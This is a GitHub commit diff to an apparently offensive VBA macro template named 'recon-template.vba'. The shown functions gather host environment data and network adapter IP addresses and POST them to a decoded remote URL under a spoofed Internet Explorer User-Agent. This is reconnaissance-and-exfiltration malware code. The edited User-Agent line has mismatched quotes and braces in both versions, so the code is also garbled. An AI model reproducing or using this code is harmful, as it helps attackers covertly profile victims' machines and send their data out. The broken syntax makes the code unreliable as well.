Update recon-template.vba

patch-1
Mr.Un1k0d3r 2017-08-09 17:01:27 -04:00 committed by GitHub
parent e92382800f
commit 30c5968f97
1 changed files with 2 additions and 2 deletions

View File

@ -18,7 +18,7 @@ Function env_query() As String
URL = decode("[URL]")
env_query2.Open "POST", URL, False
env_query2.setRequestHeader decode({["User-Agent", "Mozilla/4.0 (compatible; Recon MSIE 6.0; Windows NT 5.0)"]})
env_query2.setRequestHeader "User-Agent", decode("{[Mozilla/4.0 (compatible; Recon MSIE 6.0; Windows NT 5.0)"]})
env_query2.send(env_query1)
End Function
@ -59,4 +59,4 @@ Function network_list() As String
network_list4 = network_list4 & "," & network_list3.IPAddress & "=" & network_list3.Description
Next
network_list = network_list4
End Function
End Function